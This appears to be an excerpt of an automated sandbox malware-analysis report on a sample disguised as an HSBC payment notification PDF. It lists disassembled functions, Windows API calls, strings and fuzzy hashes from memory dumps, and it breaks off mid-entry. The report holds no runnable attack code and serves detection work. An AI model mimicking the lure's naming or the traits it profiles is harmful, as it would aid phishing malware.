Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: fc20ddc87a5fd273a18fa8ef1565cbc608650ceaa5a7efc3272966d010428556
Instruction ID: 8deadb4208ce055a946e280c670b0e99f3db2db319c6731f307d9ea981cf4585
Opcode Fuzzy Hash: fc20ddc87a5fd273a18fa8ef1565cbc608650ceaa5a7efc3272966d010428556
Instruction Fuzzy Hash: 94E0C236004401FBDA011FE1EC0C90ABB69FB89322B108A38F219C1074CB32A828DB58

Function 004785ED Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00478613
CharUpperBuffW.USER32(?,?), ref: 00478722
VariantClear.OLEAUT32(?), ref: 0047889A

Part of subcall function 00467562: VariantInit.OLEAUT32(00000000), ref: 004675A2
Part of subcall function 00467562: VariantCopy.OLEAUT32(00000000,?), ref: 004675AB
Part of subcall function 00467562: VariantClear.OLEAUT32(00000000), ref: 004675B7

Strings

Incorrect Parameter format, xrefs: 0047864B, 0047880D
AUTOIT.ERROR, xrefs: 00478728

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: 30fbddf7d199dad1f85b775506dcd4a0a024978ed7230d1fa202dd3a40196eec
Instruction ID: 60eff2204552638baa50968c5b1ec12482493ff8819337d84e8636a8f0030324
Opcode Fuzzy Hash: 30fbddf7d199dad1f85b775506dcd4a0a024978ed7230d1fa202dd3a40196eec
Instruction Fuzzy Hash: E1916D756043019FC710EF25C48499BB7E4EF89718F14896EF88A9B3A2DB34ED06CB56

Function 00462A96 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9

_memset.LIBCMT ref: 00462B87
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00462BB6
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00462C69
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00462C97

Strings

0, xrefs: 00462B73

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: c0441e51c872921f63f0ad8f30da6dab57a603ba4cf32f94d03f5d95ba2b5c07
Instruction ID: 8d65d54c91bb2834d650baaa5c58db0a2d3f708132dab7008ae6ceb83fe6ffca
Opcode Fuzzy Hash: c0441e51c872921f63f0ad8f30da6dab57a603ba4cf32f94d03f5d95ba2b5c07
Instruction Fuzzy Hash: BF51DD71208B01AED7249E28DA44A6F77E8EF44314F040A2FF880D7291EBB8DC44875B

Function 00416192 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 141COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00416248
_memmove.LIBCMT ref: 004162E4
_memset.LIBCMT ref: 00416308

Strings

ERCP, xrefs: 004161B3
3cA, xrefs: 004162AF

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: _memset$_memmove
String ID: 3cA$ERCP
API String ID: 2532777613-1471582817
Opcode ID: f26897e622874a94d3a5be45ebb38ce857f1f7ed6e3ab2c2ed74d649e7167b68
Instruction ID: eaf8e981165fb7e982de03985e75bf568e49202a02b644e32a28802e4b47c64a
Opcode Fuzzy Hash: f26897e622874a94d3a5be45ebb38ce857f1f7ed6e3ab2c2ed74d649e7167b68
Instruction Fuzzy Hash: 02518C71A00709DBDB24DF65C9817EBB7F4AF04304F2085AFE94A86241E778EA858B59

Function 00462753 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004627C0
GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 004627DC
DeleteMenu.USER32(?,00000007,00000000), ref: 00462822
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,004C5890,00000000), ref: 0046286B

Strings

0, xrefs: 004627B5

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: 0b59e6d123104e8f486f51701735be17c722a032adafe4466648fbe3018c70b5
Instruction ID: 6162d5963bf1ca612739d8e457cf9df7481532cfa70a9704744149088ee17d1e
Opcode Fuzzy Hash: 0b59e6d123104e8f486f51701735be17c722a032adafe4466648fbe3018c70b5
Instruction Fuzzy Hash: F141AE70604701AFD720EF29CD44B1BBBE4AF84314F044A2EF96597391E7B8A905CB6B

Function 00458E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22

Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00458F14
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00458F27
SendMessageW.USER32(?,00000189,?,00000000), ref: 00458F57

Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06

Strings

ListBox, xrefs: 00458ED3
ComboBox, xrefs: 00458E9E

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: MessageSend$_memmove$ClassName
String ID: ComboBox$ListBox
API String ID: 365058703-1403004172
Opcode ID: 5775ec906f698195cde3e527aabb6dfe91670bbae6028ffb5bdc1b6155921f6c
Instruction ID: 808fcc3072a567dbeea6ba3b2dea5d83030b8b2133ef71414da725dc7de09f99
Opcode Fuzzy Hash: 5775ec906f698195cde3e527aabb6dfe91670bbae6028ffb5bdc1b6155921f6c
Instruction Fuzzy Hash: 1021F572A00108BEDB14ABA19C45DFF7769DF05324B10462FF825B72E2DE3D180E9A28

Function 004863E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00401D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00401D73
Part of subcall function 00401D35: GetStockObject.GDI32(00000011), ref: 00401D87
Part of subcall function 00401D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00401D91

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00486461
LoadLibraryW.KERNEL32(?), ref: 00486468
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 0048647D
DestroyWindow.USER32(?), ref: 00486485

Strings

SysAnimate32, xrefs: 0048643C

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: b969d8637368705cbd5fc3c3416812969f869cc3827cfeeeab454fcba1ebf117
Instruction ID: 96a79e02294e314170444e54cb88eb83d8519b29eeb49143b64c907e724dd28e
Opcode Fuzzy Hash: b969d8637368705cbd5fc3c3416812969f869cc3827cfeeeab454fcba1ebf117
Instruction Fuzzy Hash: 2C219571110205BFEF506F64DC40EBF37ADEF54724F114A2AF91492190D739DC41A768

Function 00466D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00466DBC
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00466DEF
GetStdHandle.KERNEL32(0000000C), ref: 00466E01
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00466E3B

Strings

nul, xrefs: 00466E36

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: f98635b68cd5b0ab1880de70f3850fd061f65506a9295ae7d453fc561602cffb
Instruction ID: cca2de9678abd998f0cd8c5114a45f7ff5fc269ace22cdb61a343b4aec1dc2fa
Opcode Fuzzy Hash: f98635b68cd5b0ab1880de70f3850fd061f65506a9295ae7d453fc561602cffb
Instruction Fuzzy Hash: 8B219274600209ABDB209F29DC05A9A77F8EF44720F214A2FFCA0D73D0EB759955CB5A

Function 00466E6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00466E89
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00466EBB
GetStdHandle.KERNEL32(000000F6), ref: 00466ECC
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00466F06

Strings

nul, xrefs: 00466F01

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: f710eb54d58d972596414a75e1bad7db44e4d7afab8e48cef3b5ff9c2d25cc6d
Instruction ID: 3a9fffd2e99ff55030e4788a991c608e9c08d8bb738c80722c17144d2858802a
Opcode Fuzzy Hash: f710eb54d58d972596414a75e1bad7db44e4d7afab8e48cef3b5ff9c2d25cc6d
Instruction Fuzzy Hash: 7B21C7795003059BDB209F69CC04A9B77A8EF44724F210B1EFCA0D33D0E7759851C75A

Function 0046AC40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0046AC54
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0046ACA8
__swprintf.LIBCMT ref: 0046ACC1
SetErrorMode.KERNEL32(00000000,00000001,00000000,0048F910), ref: 0046ACFF

Strings

%lu, xrefs: 0046ACBB

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: 1226eaab5c3aec93efd893ba7ce645b68cb4b14e47f6f225cd052cc4731cbfea
Instruction ID: 026ba00fef41ead7d753cb67677e2cef5533d5e87c35db631ff5a0b10e4673a5
Opcode Fuzzy Hash: 1226eaab5c3aec93efd893ba7ce645b68cb4b14e47f6f225cd052cc4731cbfea
Instruction Fuzzy Hash: FE217470600109AFCB10EF65C945DAE77B8EF49318B10447EF905AB252DA35EE55CB25

Function 009D3552 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,009D3503,00000003,?,009D34A3,00000003,009ECE80,0000000C,009D35CD,00000003,00000002), ref: 009D3572
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 009D3585
FreeLibrary.KERNEL32(00000000,?,?,?,009D3503,00000003,?,009D34A3,00000003,009ECE80,0000000C,009D35CD,00000003,00000002,00000000), ref: 009D35A8

Strings

CorExitProcess, xrefs: 009D357D
mscoree.dll, xrefs: 009D356B

Memory Dump Source

Source File: 00000001.00000002.1385260628.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: bf81749fdbaac7054a64c80f4e5719728c787e9d92f34f84ed3572e53ad44321
Instruction ID: ee23191034e7cf1b63e0f0aa9ee7caa11febd9e49738d9feee10e1c366f4cb3d
Opcode Fuzzy Hash: bf81749fdbaac7054a64c80f4e5719728c787e9d92f34f84ed3572e53ad44321
Instruction Fuzzy Hash: 22F0C830A95209BBCB01AF95EC0DBADBFB8EF44756F008066F809A2250CB309F80DB51

Function 0047EB55 Relevance: 7.7, APIs: 5, Instructions: 247COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047EC07
GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047EC37
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0047ED6A
CloseHandle.KERNEL32(?), ref: 0047EDEB

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: 0682de77952afe081ab9211739b9fa55dc0894d1ffd7185653a5878fd6647099
Instruction ID: fffec5fe55f17e3d6af6322d033c5a61601868e7b6c72126a0bd4eac84abd099
Opcode Fuzzy Hash: 0682de77952afe081ab9211739b9fa55dc0894d1ffd7185653a5878fd6647099
Instruction Fuzzy Hash: F38191B16007009FD720EF29C846F6AB7E5AF48714F04C96EF999AB3D2D674AC44CB49

Function 00480037 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22

Part of subcall function 00480E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004800FD
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0048013C
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00480183
RegCloseKey.ADVAPI32(?,?), ref: 004801AF
RegCloseKey.ADVAPI32(00000000), ref: 004801BC

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
String ID:
API String ID: 3440857362-0
Opcode ID: 3bdeb89f84ddb2d76b562790cbf358911bbf2c76af4dc57bd1f5005be4229c28
Instruction ID: 88ea7daa6ea56d794f8f44f15d5cebce8ee28ea1eb3ac59e56a3faba9080710b
Opcode Fuzzy Hash: 3bdeb89f84ddb2d76b562790cbf358911bbf2c76af4dc57bd1f5005be4229c28
Instruction Fuzzy Hash: 00517E71214204AFC704EF54C885E6FB7E8FF84318F40492EF595972A2DB39E909CB56

Function 0046E571 Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0046E61F
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0046E648
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0046E687

Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0046E6AC
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0046E6B4

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: 8f2ae4a4443c6bc7a9da2abdf3aecd68817ef5b13d258d4547a7daef5705853c
Instruction ID: 91bc9b0f2d422c2787d2346e32f4aa496c052f5f6ad9ddd010e4038a96899c27
Opcode Fuzzy Hash: 8f2ae4a4443c6bc7a9da2abdf3aecd68817ef5b13d258d4547a7daef5705853c
Instruction Fuzzy Hash: 21514D75A00105DFCB01EF65C981AAEBBF5EF09314F1480AAE809AB3A2DB35ED11CF55

Function 0048A056 Relevance: 7.6, APIs: 5, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22afa8660c4250821daf86cd4b3c3329a23997c60e7bd91151dab5187926c109
Instruction ID: 1d009f8157befd3e54c409f5ed609bf9f47d87f5e0fd5ad8ffda0b3aa488663e
Opcode Fuzzy Hash: 22afa8660c4250821daf86cd4b3c3329a23997c60e7bd91151dab5187926c109
Instruction Fuzzy Hash: A1419435904114ABE710FF24CC4CFAEBBA4EB09310F144A67E815A73E1C7B8AD65D75A

Function 00402344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00402357
ScreenToClient.USER32(004C57B0,?), ref: 00402374
GetAsyncKeyState.USER32(00000001), ref: 00402399
GetAsyncKeyState.USER32(00000002), ref: 004023A7

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 68046f809d22b14954676cdf12726acdb6c494720a6fd25c838d2cb9e82985d9
